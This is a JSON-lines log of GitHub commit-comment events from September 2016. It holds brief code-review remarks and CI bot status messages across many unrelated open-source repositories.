{"id":"4564439346","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"bobtian19/dsp"},"payload":{"comment":{"id":19026315,"position":null,"line":null,"path":null,"commit_id":"84b257f9e6a282bf5c88d79a66b75a02db68ebcc","created_at":"2016-09-14T20:38:15Z","updated_at":"2016-09-14T20:38:15Z","body":"@bobtian19 Nice.  `Numpy arrays` is the workhorse data structure for all of scientific computing in Python"}},"created_at":"2016-09-14T20:38:15Z"}
{"id":"4564444650","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19026329,"position":31,"line":110,"path":"src/logger.c","commit_id":"304da88035303e12696deadfb4ed6a3ecb41c4c9","created_at":"2016-09-14T20:39:12Z","updated_at":"2016-09-14T20:39:12Z","body":"Go ahead.  Just use the define I already have, but add mingw to it also."}},"created_at":"2016-09-14T20:39:12Z"}
{"id":"4564448910","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":19026340,"position":58,"line":46,"path":"_posts/plotly2/2016-08-12-how-to-add-collaborators-in-Plotly-2.md","commit_id":"6bf0d18d3c63ebdf80776448eb5da9d0e07e2616","created_at":"2016-09-14T20:39:58Z","updated_at":"2016-09-14T20:39:58Z","body":"instead of whatsoever- can you say '.. for them to edit any element of the plot, you must..'\r\n\r\nI know I said whatsoever in my previous comment but that was my explanation to you, maybe not th best syntax for the copy :D "}},"created_at":"2016-09-14T20:39:58Z"}
{"id":"4564450172","type":"CommitCommentEvent","actor":{"login":"chalin"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19026343,"position":5,"line":219,"path":"tools/dart-api-builder/dab.js","commit_id":"9f034ab558276a12c341cb8fdc0916aa5727f353","created_at":"2016-09-14T20:40:14Z","updated_at":"2016-09-14T20:40:14Z","body":"I guess a CSS expert just figured it out! Yay! 🎉 "}},"created_at":"2016-09-14T20:40:14Z"}
{"id":"4564453078","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19026353,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:40:43Z","updated_at":"2016-09-14T20:40:43Z","body":"Regarding above code, that's gotta be it."}},"created_at":"2016-09-14T20:40:43Z"}
{"id":"4564453434","type":"CommitCommentEvent","actor":{"login":"RomaStarovoitov"},"repo":{"name":"RomaStarovoitov/RomaStarovoitov.github.io"},"payload":{"comment":{"id":19026354,"position":null,"line":null,"path":null,"commit_id":"fdeaaed7930312b3e57707abc56632fdacbca2ea","created_at":"2016-09-14T20:40:47Z","updated_at":"2016-09-14T20:40:47Z","body":"1"}},"created_at":"2016-09-14T20:40:47Z"}
{"id":"4564455521","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19026359,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:41:10Z","updated_at":"2016-09-14T20:41:10Z","body":"Did we get a message in log from that code?"}},"created_at":"2016-09-14T20:41:10Z"}
{"id":"4564456483","type":"CommitCommentEvent","actor":{"login":"olifre"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":19026360,"position":null,"line":null,"path":null,"commit_id":"9213db0d492de3ca94a92116aec969597642d83e","created_at":"2016-09-14T20:41:20Z","updated_at":"2016-09-14T20:41:20Z","body":"Indeed looks much nicer! Also the removal of some aliased pointers there... \r\nI just gave it some basic testing, works fine here (I also tried using invalid card numbers, worked fine, i.e. errored as expected). Thanks!"}},"created_at":"2016-09-14T20:41:20Z"}
{"id":"4564457400","type":"CommitCommentEvent","actor":{"login":"Kjens93"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":19026363,"position":null,"line":null,"path":null,"commit_id":"92a62997adb3c8512328d5a0ae42fe5d156291f1","created_at":"2016-09-14T20:41:29Z","updated_at":"2016-09-14T20:41:29Z","body":"@shazron Any idea when a release will be published including this commit?"}},"created_at":"2016-09-14T20:41:29Z"}
{"id":"4564458480","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19026369,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:41:41Z","updated_at":"2016-09-14T20:41:41Z","body":"`node --version`\r\nv6.4.0\r\n\r\n`npm --version`\r\n3.10.3\r\n\r\nNot sure which one you mean with 4.5.0 ? I do not feel very comfortable with all the [node versioning](https://nodejs.org/en/download/releases/). Maybe someone else can try to see if the same `main.js` is generated ?"}},"created_at":"2016-09-14T20:41:41Z"}
{"id":"4564461450","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":19026381,"position":77,"line":80,"path":"_posts/plotly2/2016-08-12-how-to-add-collaborators-in-Plotly-2.md","commit_id":"6bf0d18d3c63ebdf80776448eb5da9d0e07e2616","created_at":"2016-09-14T20:42:15Z","updated_at":"2016-09-14T20:42:15Z","body":"I'd remove this last tip- as you've already mentioned and linked sharing at the top of this tutorial, and this should probably focus on tips for collab"}},"created_at":"2016-09-14T20:42:15Z"}
{"id":"4564463832","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19026389,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:42:38Z","updated_at":"2016-09-14T20:42:38Z","body":"Ups, yes. I meant the LTS version of node, not npm ... will try your versions soon"}},"created_at":"2016-09-14T20:42:38Z"}
{"id":"4564467328","type":"CommitCommentEvent","actor":{"login":"nrgraham23"},"repo":{"name":"hjelmn/ompi"},"payload":{"comment":{"id":19026395,"position":null,"line":null,"path":null,"commit_id":"fef06eeb6c90133dd48a01dcc8039d27850e2384","created_at":"2016-09-14T20:43:15Z","updated_at":"2016-09-14T20:43:15Z","body":"This fixes open-mpi/ompi#2080, not #2081. The #2081 is a Java thing I need to look at."}},"created_at":"2016-09-14T20:43:15Z"}
{"id":"4564468312","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19026399,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:43:25Z","updated_at":"2016-09-14T20:43:25Z","body":"Ok, but I do not think this has very high priority ;)"}},"created_at":"2016-09-14T20:43:25Z"}
{"id":"4564469857","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19026405,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-14T20:43:43Z","updated_at":"2016-09-14T20:43:43Z","body":"Yes , this part understanding , but now trhee option , right : full iso with full customization and program , hybrid where user can decide what install or not with metapkg ( thinking like : office , game ecc ) and the new netinstall for install the minimal set without conf or ( here my confusion )  any pkg in the yaml list can be selected or unselected ?"}},"created_at":"2016-09-14T20:43:43Z"}
{"id":"4564475024","type":"CommitCommentEvent","actor":{"login":"sosey"},"repo":{"name":"spacetelescope/iraf_replacement"},"payload":{"comment":{"id":19026421,"position":null,"line":null,"path":null,"commit_id":"cc0fe62a73d9b40ddf9989c5db826d27c7a54a14","created_at":"2016-09-14T20:44:41Z","updated_at":"2016-09-14T20:44:41Z","body":"HAhahahha, really?  <wah waaaa> :( "}},"created_at":"2016-09-14T20:44:41Z"}
{"id":"4564475155","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":19026422,"position":6,"line":53,"path":"server/data/npc/lib/npcsystem/modules.lua","commit_id":"22783ff6c31c055e6cd87f4237e9285bc11eb6da","created_at":"2016-09-14T20:44:42Z","updated_at":"2016-09-14T20:44:42Z","body":"NOOOOOOOOOO"}},"created_at":"2016-09-14T20:44:42Z"}
{"id":"4564476038","type":"CommitCommentEvent","actor":{"login":"RoloDMonkey"},"repo":{"name":"MarketoMA/marketo_ma"},"payload":{"comment":{"id":19026424,"position":null,"line":null,"path":null,"commit_id":"f2377477c466b45503299775362c454f19770ddf","created_at":"2016-09-14T20:44:52Z","updated_at":"2016-09-14T20:44:52Z","body":"I think I understand why you want to use a constant.\r\n\r\nBut, I'm not quite sure why you would use two. Since mma_user requires marketo_ma, can't we just use the one constant declared in marketo_ma?"}},"created_at":"2016-09-14T20:44:52Z"}
{"id":"4564479518","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"kmix27/dsp"},"payload":{"comment":{"id":19026438,"position":null,"line":null,"path":null,"commit_id":"3e693e23246b8a824608143007691838977db2f1","created_at":"2016-09-14T20:45:30Z","updated_at":"2016-09-14T20:45:30Z","body":"@kmix27 Good to see that you have an head Start on Pandas.  But we will be doing some of the data munging using base python dicts in the first two days of week 1, before we introduce Pandas.  So you will have an opportunity to improve the skills with basic data structures"}},"created_at":"2016-09-14T20:45:30Z"}
{"id":"4564480260","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":19026440,"position":70,"line":1177,"path":"server/data/npc/lib/npcsystem/modules.lua","commit_id":"22783ff6c31c055e6cd87f4237e9285bc11eb6da","created_at":"2016-09-14T20:45:37Z","updated_at":"2016-09-14T20:45:37Z","body":"NOOOO\r\n"}},"created_at":"2016-09-14T20:45:37Z"}
{"id":"4564483329","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19026442,"position":null,"line":null,"path":null,"commit_id":"9fdf16f9c139e39c45a7e0e741eb0b6a741be17d","created_at":"2016-09-14T20:46:12Z","updated_at":"2016-09-14T20:46:12Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GUAmlVo3RQetcpQ2E455Dg"}},"created_at":"2016-09-14T20:46:12Z"}
{"id":"4564485568","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19026451,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-14T20:46:35Z","updated_at":"2016-09-14T20:46:35Z","body":"The netinstall.yaml will download all packages, ie it downloads a complete system based upon selection.\r\nThe hybrid.yaml will only download additional group.\r\n\r\nThe netinstall.yaml can serve as minimal as well as desktop install. It depends on user selection, we currently have all major DE supported."}},"created_at":"2016-09-14T20:46:35Z"}
{"id":"4564486696","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19026456,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-14T20:46:48Z","updated_at":"2016-09-14T20:46:48Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-14T20:46:48Z"}
{"id":"4564488897","type":"CommitCommentEvent","actor":{"login":"carl-mastrangelo"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":19026460,"position":null,"line":null,"path":null,"commit_id":"f24cf2a1543c55711afa015fdd8cbb4b0c562373","created_at":"2016-09-14T20:47:13Z","updated_at":"2016-09-14T20:47:13Z","body":"please use the \"package: desciption\" format commit message in the future."}},"created_at":"2016-09-14T20:47:13Z"}
{"id":"4564489183","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19026462,"position":null,"line":null,"path":null,"commit_id":"a6d5e0c8b9d386f1b917e61c46d9710723c42f2f","created_at":"2016-09-14T20:47:15Z","updated_at":"2016-09-14T20:47:15Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 32](http://teamcity.otenv.com/viewLog.html?buildId=5212513&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T20:47:15Z"}
{"id":"4564493933","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19026479,"position":null,"line":null,"path":null,"commit_id":"96af43f4445411a8c2db4faf01ce10496a01590c","created_at":"2016-09-14T20:48:05Z","updated_at":"2016-09-14T20:48:05Z","body":"yeah decided to start over from scratch, made a new branch given how much might be doing to this... still fairly new to git so sorry about that :3"}},"created_at":"2016-09-14T20:48:05Z"}
{"id":"4564498773","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19026491,"position":4,"line":4,"path":"scripts/install-jdk8-linux.sh","commit_id":"702052f56f2ac7fc4764ebff94989d769246fa11","created_at":"2016-09-14T20:49:01Z","updated_at":"2016-09-14T20:49:01Z","body":"Responding point by point.\r\n\r\n1) sounds good, I'll do this\r\n2) agreed\r\n3) I believe update needs to be run before any of the install stuff (doesn't happen automatically)\r\n4) This actually installs the oracle JDK\r\n5) agreed\r\n6) will delete this script, but will keep this in mind for the future"}},"created_at":"2016-09-14T20:49:01Z"}
{"id":"4564500483","type":"CommitCommentEvent","actor":{"login":"PuuTuu"},"repo":{"name":"dropbox/ClickTheBox-android"},"payload":{"comment":{"id":19026500,"position":null,"line":null,"path":null,"commit_id":"1786cc2de373d4d87cf0ef74bed198f71c71fb56","created_at":"2016-09-14T20:49:20Z","updated_at":"2016-09-14T20:49:20Z","body":"1786cc2"}},"created_at":"2016-09-14T20:49:20Z"}
{"id":"4564500675","type":"CommitCommentEvent","actor":{"login":"Ste74"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19026502,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-14T20:49:23Z","updated_at":"2016-09-14T20:49:23Z","body":":smiley: I want to try it now :wink: "}},"created_at":"2016-09-14T20:49:23Z"}
{"id":"4564500921","type":"CommitCommentEvent","actor":{"login":"aviau"},"repo":{"name":"syncthing/syncthing"},"payload":{"comment":{"id":19026503,"position":null,"line":null,"path":null,"commit_id":"139e9b144eba1f94f4d847a5c234c825a6d09078","created_at":"2016-09-14T20:49:25Z","updated_at":"2016-09-14T20:49:25Z","body":":heart:  @calmh "}},"created_at":"2016-09-14T20:49:25Z"}
{"id":"4564502221","type":"CommitCommentEvent","actor":{"login":"brentp"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19026506,"position":null,"line":null,"path":null,"commit_id":"b560ed376c5889bb75ba4c86e3c136ab65f6179a","created_at":"2016-09-14T20:49:40Z","updated_at":"2016-09-14T20:49:40Z","body":"thanks Rory, you just got me the use of an additional 16 cpus."}},"created_at":"2016-09-14T20:49:40Z"}
{"id":"4564502390","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19026507,"position":null,"line":null,"path":null,"commit_id":"025002b90789e3f506e072e68cfa68c90eef296a","created_at":"2016-09-14T20:49:42Z","updated_at":"2016-09-14T20:49:42Z","body":"This gives a pet bar to creatures summoned by the following spells:\r\n\r\nhttp://www.wowhead.com/spell=59565/summon-reanimated-abomination\r\nhttp://www.wowhead.com/spell=56409/the-earthen-oath\r\nhttp://www.wowhead.com/spell=1122/summon-infernal\r\nhttp://www.wowhead.com/spell=22865/summon-doomguard\r\n\r\n"}},"created_at":"2016-09-14T20:49:42Z"}
{"id":"4564503971","type":"CommitCommentEvent","actor":{"login":"wm4"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":19026510,"position":null,"line":null,"path":null,"commit_id":"9213db0d492de3ca94a92116aec969597642d83e","created_at":"2016-09-14T20:49:58Z","updated_at":"2016-09-14T20:49:58Z","body":"Thanks for testing!"}},"created_at":"2016-09-14T20:49:58Z"}
{"id":"4564504415","type":"CommitCommentEvent","actor":{"login":"roryk"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19026511,"position":null,"line":null,"path":null,"commit_id":"b560ed376c5889bb75ba4c86e3c136ab65f6179a","created_at":"2016-09-14T20:50:04Z","updated_at":"2016-09-14T20:50:04Z","body":"Sweet!"}},"created_at":"2016-09-14T20:50:04Z"}
{"id":"4564507532","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19026515,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:50:39Z","updated_at":"2016-09-14T20:50:39Z","body":"No we didn't, not that I saw. But it is an assert, which would appear in the linked DLL if it were to appear at all."}},"created_at":"2016-09-14T20:50:39Z"}
{"id":"4564509326","type":"CommitCommentEvent","actor":{"login":"technonerdz"},"repo":{"name":"technonerdz/FRC__Bot-Messenger-CB"},"payload":{"comment":{"id":19026520,"position":null,"line":null,"path":null,"commit_id":"e710e5d9423919294f6f9ad027412077ba74318d","created_at":"2016-09-14T20:51:00Z","updated_at":"2016-09-14T20:51:00Z","body":"also added sponsor command"}},"created_at":"2016-09-14T20:51:00Z"}
{"id":"4564513671","type":"CommitCommentEvent","actor":{"login":"ifiddes"},"repo":{"name":"ucsc-mus-strain-cactus/Comparative-Annotation-Toolkit"},"payload":{"comment":{"id":19026533,"position":null,"line":null,"path":null,"commit_id":"4791a97c233a2ff6748c21d012ec1de175812b9d","created_at":"2016-09-14T20:51:47Z","updated_at":"2016-09-14T20:51:47Z","body":"Unfortunately, this means that InFrameStop is needlessly calculated twice. This is extra unfortunate as it is the only classifier that needs the genomic sequences, which adds a lot of overhead."}},"created_at":"2016-09-14T20:51:47Z"}
{"id":"4564514174","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19026536,"position":null,"line":null,"path":null,"commit_id":"a6d5e0c8b9d386f1b917e61c46d9710723c42f2f","created_at":"2016-09-14T20:51:53Z","updated_at":"2016-09-14T20:51:53Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 32](http://teamcity.otenv.com/viewLog.html?buildId=5212513&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:04:37"}},"created_at":"2016-09-14T20:51:53Z"}
{"id":"4564523205","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":19026572,"position":11,"line":141,"path":"lib/index.js","commit_id":"60d4a7dcf8ec761e3eeca03db690b0867b9e38c7","created_at":"2016-09-14T20:53:25Z","updated_at":"2016-09-14T20:53:25Z","body":"This looks like it is causing issues such as #875."}},"created_at":"2016-09-14T20:53:25Z"}
{"id":"4564527569","type":"CommitCommentEvent","actor":{"login":"sampathweb"},"repo":{"name":"rohans90/dsp"},"payload":{"comment":{"id":19026590,"position":18,"line":16,"path":"python/advanced_python_dict.py","commit_id":"19cd73c7ee1e213705dad2778f01936b4500d936","created_at":"2016-09-14T20:54:13Z","updated_at":"2016-09-14T20:54:13Z","body":"@rohans90 Good use of Sorted function with `lambda` key function 👍 "}},"created_at":"2016-09-14T20:54:13Z"}
{"id":"4564529741","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19026597,"position":5,"line":98,"path":"templates/partials/contacts_content.html","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-14T20:54:35Z","updated_at":"2016-09-14T20:54:35Z","body":"So I changed the font size to the one in the mock and it fits on tecno and IMO is still perfectly clickable, even after I tightened up the padding a bit to make it look less weird and spaced out:\r\n![screenshot_2016-09-14-21-53-10](https://cloud.githubusercontent.com/assets/583851/18529630/cce41f16-7ac5-11e6-821f-23756639206c.png)\r\n"}},"created_at":"2016-09-14T20:54:35Z"}
{"id":"4564531396","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19026600,"position":null,"line":null,"path":null,"commit_id":"740f65ce07da0f21a314ed67af306ffb65e4ea7f","created_at":"2016-09-14T20:54:52Z","updated_at":"2016-09-14T20:54:52Z","body":"OMIT"}},"created_at":"2016-09-14T20:54:52Z"}
{"id":"4564531536","type":"CommitCommentEvent","actor":{"login":"developit"},"repo":{"name":"developit/preact-compat"},"payload":{"comment":{"id":19026601,"position":6,"line":388,"path":"src/index.js","commit_id":"cc32ff3af40833f425556e5dc4ebda4c7a559bdf","created_at":"2016-09-14T20:54:54Z","updated_at":"2016-09-14T20:54:54Z","body":"@robbiewxyz I think we might need to run this before `render()` as well, at least the props normalization bit.  Or maybe it's enough having already run it in `componentWillReceiveProps()`? I don't believe that's called for initial render."}},"created_at":"2016-09-14T20:54:54Z"}
{"id":"4564533696","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19026612,"position":null,"line":null,"path":null,"commit_id":"9a275db77e918a93a78434a85334629b01fcd5d7","created_at":"2016-09-14T20:55:17Z","updated_at":"2016-09-14T20:55:17Z","body":"OMIT"}},"created_at":"2016-09-14T20:55:17Z"}
{"id":"4564535985","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19026616,"position":null,"line":null,"path":null,"commit_id":"15095ccbb3a63dda10209f607ffe20764b72e88c","created_at":"2016-09-14T20:55:40Z","updated_at":"2016-09-14T20:55:40Z","body":"OMIT"}},"created_at":"2016-09-14T20:55:40Z"}
{"id":"4564540115","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19026622,"position":null,"line":null,"path":null,"commit_id":"ee5dba3dd0f0bc94b0cb53d560d19ce379984b7f","created_at":"2016-09-14T20:56:23Z","updated_at":"2016-09-14T20:56:23Z","body":"OMIT"}},"created_at":"2016-09-14T20:56:23Z"}
{"id":"4564540312","type":"CommitCommentEvent","actor":{"login":"dphiffer"},"repo":{"name":"whosonfirst-data/whosonfirst-data-venue-us-ny"},"payload":{"comment":{"id":19026623,"position":null,"line":null,"path":null,"commit_id":"f67cc5487e388c1a3f986dff856ecb2fd3aaa4be","created_at":"2016-09-14T20:56:25Z","updated_at":"2016-09-14T20:56:25Z","body":"Yes! See also: https://github.com/whosonfirst/whosonfirst-properties/blob/master/properties/mz.md#hours"}},"created_at":"2016-09-14T20:56:25Z"}
{"id":"4564541381","type":"CommitCommentEvent","actor":{"login":"jar398"},"repo":{"name":"OpenTreeOfLife/reference-taxonomy"},"payload":{"comment":{"id":19026629,"position":null,"line":null,"path":null,"commit_id":"a95f2ed04b1bd4eda7a7a424f70cbc2c0647669a","created_at":"2016-09-14T20:56:35Z","updated_at":"2016-09-14T20:56:35Z","body":"I'm going to delete Skos.java, making this moot. The module has never been used, and if we ever need it we can solve the library problem at that time."}},"created_at":"2016-09-14T20:56:35Z"}
{"id":"4564546165","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19026639,"position":5,"line":98,"path":"templates/partials/contacts_content.html","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-14T20:57:24Z","updated_at":"2016-09-14T20:57:24Z","body":"Ok. I hope the text isn't any longer in any other language... eg: \"weeks\" -> \"semaines\" (French)"}},"created_at":"2016-09-14T20:57:24Z"}
{"id":"4564548845","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026647,"position":32,"line":32,"path":"backend/src/main/java/ru/avito/model/AuthModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:57:51Z","updated_at":"2016-09-14T20:57:51Z","body":"```java\r\nUSERS.USER_NAME\r\n```\r\nнадо тут поменять на статический импорт, что бы было просто USER_NAME, здесь и везде дальше по коду."}},"created_at":"2016-09-14T20:57:51Z"}
{"id":"4564553091","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19026660,"position":null,"line":null,"path":null,"commit_id":"a6d5e0c8b9d386f1b917e61c46d9710723c42f2f","created_at":"2016-09-14T20:58:36Z","updated_at":"2016-09-14T20:58:36Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 33](http://teamcity.otenv.com/viewLog.html?buildId=5212610&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T20:58:36Z"}
{"id":"4564553299","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026661,"position":35,"line":35,"path":"backend/src/main/java/ru/avito/model/CallModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:58:38Z","updated_at":"2016-09-14T20:58:38Z","body":"Тоже самое это все должно хранится не в коде."}},"created_at":"2016-09-14T20:58:38Z"}
{"id":"4564553678","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19026663,"position":null,"line":null,"path":null,"commit_id":"959128179ece6069beb1b43abf24a0961e6d1896","created_at":"2016-09-14T20:58:41Z","updated_at":"2016-09-14T20:58:41Z","body":"Alex, I'm making a multi-language text adventure.\n\n*THE D VERSION IS PRIORITY.*\n"}},"created_at":"2016-09-14T20:58:41Z"}
{"id":"4564555364","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026668,"position":56,"line":56,"path":"backend/src/main/java/ru/avito/model/CallModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:58:58Z","updated_at":"2016-09-14T20:58:58Z","body":"Хуйня какая то...."}},"created_at":"2016-09-14T20:58:58Z"}
{"id":"4564557110","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026670,"position":78,"line":78,"path":"backend/src/main/java/ru/avito/model/CallModel.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:59:14Z","updated_at":"2016-09-14T20:59:14Z","body":"хуйня какая то"}},"created_at":"2016-09-14T20:59:14Z"}
{"id":"4564559874","type":"CommitCommentEvent","actor":{"login":"SibTiger"},"repo":{"name":"SibTiger/OMG_I_CANT_DIVIDE_BY_ZERO_EXLAMATIONMARK"},"payload":{"comment":{"id":19026675,"position":4,"line":4,"path":"WatchingBadGamesThanksLowTax","commit_id":"787871b8e98fafdf0077af7f4b4f592350a81ea1","created_at":"2016-09-14T20:59:42Z","updated_at":"2016-09-14T20:59:42Z","body":"[Green, GREEN!!!!](http://lparchive.org/Daikatana/)"}},"created_at":"2016-09-14T20:59:42Z"}
{"id":"4564560297","type":"CommitCommentEvent","actor":{"login":"artem-gunkin"},"repo":{"name":"artem-gunkin/Gunkin-11405-Java-2016"},"payload":{"comment":{"id":19026678,"position":null,"line":null,"path":null,"commit_id":"46020d548dc47f50f1cd994b557c602e4302bb69","created_at":"2016-09-14T20:59:46Z","updated_at":"2016-09-14T20:59:46Z","body":"Merged."}},"created_at":"2016-09-14T20:59:46Z"}
